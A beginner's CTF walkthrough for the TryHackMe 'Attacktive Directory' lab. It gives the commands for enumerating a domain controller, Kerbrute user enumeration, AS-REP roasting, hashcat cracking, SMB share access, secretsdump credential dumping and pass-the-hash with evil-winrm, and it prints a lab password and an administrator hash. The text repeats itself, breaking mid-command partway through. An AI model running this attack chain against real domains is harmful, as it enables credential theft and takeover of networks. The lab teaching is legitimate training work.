Attacktive Directory THM — Walkthrough

I want to share this kind of walkthrough for the Try Hack Me attacktive directory CTF room. This could be helpful for beginners or anyone interested. I give you some useful links to read for you to understand just a little more about the further steps inside the challenge and the way I solved it, if you have some comments or observations I would like to read you 🙂.

Lets do it, Happy Hacking.

TryHackMe link

TryHackMe | Attacktive Directory

99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

tryhackme.com

Recommended Lectures/Resources

I added some links at the end of the walkthrough for you to get involve with topics related to this challenge, if you are a total beginner I recommend you to first take a look to those links.

[Task 1] Deploy the machine

99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

Learning objectives:

• Impacket
• Kerbrute
• AD Enumeration
• Kerberos
• Cracking Hashes
• Hashcat
• Privilege Scalation

[Task 2] Impacket Installation

After installing it, remember for later: Impacket PATH

[Task 3] Enumerate the DC

Initial note:

Flags for each user account are available for submission. You can retrieve the flags for user accounts via RDP (Note: the login format is spookysec.local/User at the Window’s login prompt) and Administrator via Evil-WinRM.

Basic enumeration tactics will yield a number of ports open. Using a popular enumeration tool that’s built on Linux 4 Windows will reveal some information, not a lot to work with however.

Q1 — How many ports are open under 10.000?

Discovering with NMAP

#useful command nmap -oN open_ports.txt -n 10.10.71.93
# Nmap 7.80 scan initiated Tue Jun 30 20:41:59 2020 as: nmap -oN open_ports.txt -n 10.10.71.93
Nmap scan report for 10.10.71.93
Host is up (0.17s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
# Nmap done at Tue Jun 30 20:42:18 2020 -- 1 IP address (1 host up) scanned in 19.14 seconds

Virtual Machine IP ADDRESS — 10.10.71.93

Q2 — What tool will allow us to enumerate port 139/145?

Port 139, SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.

Port 445, Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

SMB, is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows

#useful command 
$ nmap -sC -p 139,445 -sV 10.10.71.93

Tool used — enum4linux

Q3 — What is the NETBIOS-Domain name of the machine?

THM-AD

Q4 — What invalid TLD do people commonly use for their Active Directory Domain?

.local

[Task 4] Enumerate the DC pt 2

Introduction:

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

Enumeration:

For this box, a modified User List and Password List will be used to cut down on time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.

Getting the THM box repo from the creator (Sq00ky)

Let’s clone the repository for getting Kerbrute, users.txt and passwords.txt files.

Sq00ky/attacktive-directory-tools

Contribute to Sq00ky/attacktive-directory-tools development by creating an account on GitHub.

github.com

$ git clone https://github.com/Sq00ky/attacktive-directory-tools.git
#executable kerbrute
 
$ chmod u=rwx kerbrute 
$ chmod +x kerbrute #useful command
 
$ ./kerbrute -h  #can see the usage for kerbrute

Q1 — What command whit-in kerbrute will allow us to enumerate valid usernames?

Use the help menu to find the correct command

#use 
./kerbrute -h

output

Q2 — What notable account is discovered?

Q3 — What is the other notable account is discovered?

Let’s try the command from question 1

#how to properly use userenum$ ./kerbrute userenum -h#take a look to the flags
--dc
-d
-t#formaly write it
$ ./kerbrute userenum --dc 10.10.71.93 -d spookysec.local userlist.txt -t 100#remember userlist.txt is the given list one from the creator of the box

Accounts founded — Questions 1, 2

[Task 5] Exploiting Kerberos

Introduction

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Exploitation

Impacket has a tool called “GetNPUsers.py” (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

Q1 — We have to users account that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Q2 — Looking at the hashcat examples wiki page, what type of kerberos hash did we retrieve from the KDC?

Take a look to the Hint and remember HASHCAT ;)

Q3 — What mode is the hash?

Q4 — Now crack he hash with the modified password list provided, what is the user accounts passwords?

Answering Q#2,3,4

Remember impacket path and GetNPUsers.py from previous readig? uh? time to use it.

$ GetNPUsers.py

#usage how to use GetNPuser.py
$ GetNPUsers.py  -h

#execute a command 
$ GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin

for later usage I saved the output to a txt file.

Search at the wiki page the output

Cracking the HASH

→ I passed the output (hash) to a txt file and used that file to compare the file with the passwords.

#try first$ hashcat --help#get involve then$ hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force

[Task 6] Enumerate the DC pt 3

Note: My virtual machine changed it’s ip address, do not get confuse.

Virtual Machine IP ADDRESS : 10.10.116.78

Enumeration:

With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.

Q1 — Using utility can we map remote SMB shares?

Take a look to the hint ;)

Q2 — Which option will list shares?

Q3 — How many remote shares is the server listing?

Q4 — There is one particular share that we have access to that contains a txt file. Which share is it?

Answering Q#2,3,4

$ smbclient -L 10.10.116.78 -U ‘svc-admin’

Q5 — What is the content of the file?

Q6 — Decoding the contents of the file, what is the full contents?

Lets try base64

$ base64 --decode --help
$ base64 --decode backup_credentials.txt

[Task 7] Elevating privileges

Introduction:

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?Well, it is the backup account for the Domain Controller.

This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes

Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

Q1 — What method will allowed us to dump NTDS.DIT?

Q2 — What is the administrators NTLM hash?

Secrectsdump.py

$ secretsdump.py -h
$ impacket-secretsdump -just-dc <backup:backup2517860@10.10.63.2>Useful links

Q3 — What method of attack could allow us o authenticates as the user without the password?

Pass the Hash Attack Tutorial | Lateral Movement using LanMan or NTLM hashes

Pass the Hash is a technique that enables an attacker (typically using Mimikatz) to leverage the LanMan or NTLM hashes…

attack.stealthbits.com

Q4 — Using a tool called Evil-WinRM what option will allow us to use a hash?

[Task 8] Flags

Answering Q#1,2,3

Submit the flags for each user account. They can be located on each user’s desktop.

$ evil-winrm -i 10.10.63.2 -u Administrator -H Attacktive Directory THM — Walkthrough

I want to share this kind of walkthrough for the Try Hack Me attacktive directory CTF room. This could be helpful for beginners or anyone interested. I give you some useful links to read for you to understand just a little more about the further steps inside the challenge and the way I solved it, if you have some comments or observations I would like to read you 🙂.

Lets do it, Happy Hacking.

TryHackMe link

TryHackMe | Attacktive Directory

99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

tryhackme.com

Recommended Lectures/Resources

I added some links at the end of the walkthrough for you to get involve with topics related to this challenge, if you are a total beginner I recommend you to first take a look to those links.

[Task 1] Deploy the machine

99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

Learning objectives:

• Impacket
• Kerbrute
• AD Enumeration
• Kerberos
• Cracking Hashes
• Hashcat
• Privilege Scalation

[Task 2] Impacket Installation

After installing it, remember for later: Impacket PATH

[Task 3] Enumerate the DC

Initial note:

Flags for each user account are available for submission. You can retrieve the flags for user accounts via RDP (Note: the login format is spookysec.local/User at the Window's login prompt) and Administrator via Evil-WinRM.

Basic enumeration tactics will yield a number of ports open. Using a popular enumeration tool that's built on Linux 4 Windows will reveal some information, not a lot to work with however.

Q1 — How many ports are open under 10.000?

Discovering with NMAP

#useful command nmap -oN open_ports.txt -n 10.10.71.93
# Nmap 7.80 scan initiated Tue Jun 30 20:41:59 2020 as: nmap -oN open_ports.txt -n 10.10.71.93
Nmap scan report for 10.10.71.93
Host is up (0.17s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

# Nmap done at Tue Jun 30 20:42:18 2020 -- 1 IP address (1 host up) scanned in 19.14 seconds

Virtual Machine IP ADDRESS — 10.10.71.93

Q2 — What tool will allow us to enumerate port 139/145?

Port 139, SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.

Port 445, Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

SMB, is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows

#useful command 
$ nmap -sC -p 139,445 -sV 10.10.71.93

Tool used — enum4linux

Q3 — What is the NETBIOS-Domain name of the machine?

THM-AD

Q4 — What invalid TLD do people commonly use for their Active Directory Domain?

.local

[Task 4] Enumerate the DC pt 2

Introduction:

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

Enumeration:

For this box, a modified User List and Password List will be used to cut down on time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.

Getting the THM box repo from the creator (Sq00ky)

Let’s clone the repository for getting Kerbrute, users.txt and passwords.txt files.

Sq00ky/attacktive-directory-tools

Contribute to Sq00ky/attacktive-directory-tools development by creating an account on GitHub.

github.com

$ git clone https://github.com/Sq00ky/attacktive-directory-tools.git
#executable kerbrute
 
$ chmod u=rwx kerbrute 
$ chmod +x kerbrute #useful command
 
$ ./kerbrute -h  #can see the usage for kerbrute

Q1 — What command whit-in kerbrute will allow us to enumerate valid usernames?

Use the help menu to find the correct command

#use 
./kerbrute -h

output

Q2 — What notable account is discovered?

Q3 — What is the other notable account is discovered?

Let’s try the command from question 1

#how to properly use userenum$ ./kerbrute userenum -h#take a look to the flags
--dc
-d
-t#formaly write it
$ ./kerbrute userenum --dc 10.10.71.93 -d spookysec.local userlist.txt -t 100#remember userlist.txt is the given list one from the creator of the box

Accounts founded — Questions 1, 2

[Task 5] Exploiting Kerberos

Introduction

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Exploitation

Impacket has a tool called “GetNPUsers.py” (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

Q1 — We have to users account that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Q2 — Looking at the hashcat examples wiki page, what type of kerberos hash did we retrieve from the KDC?

Take a look to the Hint and remember HASHCAT ;)

Q3 — What mode is the hash?

Q4 — Now crack he hash with the modified password list provided, what is the user accounts passwords?

Answering Q#2,3,4

Remember impacket path and GetNPUsers.py from previous readig? uh? time to use it.

$ GetNPUsers.py

#usage how to use GetNPuser.py
$ GetNPUsers.py  -h
#execute a command 
$ GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin

for later usage I saved the output to a txt file.

Search at the wiki page the output

Cracking the HASH

→ I passed the output (hash) to a txt file and used that file to compare the file with the passwords.

#try first$ hashcat --help#get involve then$ hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force

[Task 6] Enumerate the DC pt 3

Note: My virtual machine changed it’s ip address, do not get confuse.

Virtual Machine IP ADDRESS : 10.10.116.78

Enumeration:

With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.

Q1 — Using utility can we map remote SMB shares?

Take a look to the hint ;)

Q2 — Which option will list shares?

Q3 — How many remote shares is the server listing?

Q4 — There is one particular share that we have access to that contains a txt file. Which share is it?

Answering Q#2,3,4

$ smbclient -L 10.10.116.78 -U ‘svc-admin’

Q5 — What is the content of the file?

Q6 — Decoding the contents of the file, what is the full contents?

Lets try base64

$ base64 --decode --help
$ base64 --decode backup_credentials.txt

[Task 7] Elevating privileges

Note: My virtual machine changed it’s ip address, do not get confuse.

Virtual Machine IP ADDRESS : 10.10.63.2

Introduction:

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?Well, it is the backup account for the Domain Controller.

This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes

Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

Q1 — What method will allowed us to dump NTDS.DIT?

Q2 — What is the administrators NTLM hash?

Secrectsdump.py

$ secretsdump.py -h
$ impacket-secretsdump -just-dc <backup:backup2517860@10.10.63.2>Useful links

Q3 — What method of attack could allow us o authenticates as the user without the password?

Pass the Hash Attack Tutorial | Lateral Movement using LanMan or NTLM hashes

Pass the Hash is a technique that enables an attacker (typically using Mimikatz) to leverage the LanMan or NTLM hashes…

attack.stealthbits.com

Q4 — Using a tool called Evil-WinRM what option will allow us to use a hash?

[Task 8] Flags

Answering Q#1,2,3

Submit the flags for each user account. They can be located on each user’s desktop.

$ evil-winrm -i 10.10.63.2 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Congrats , You have made it :)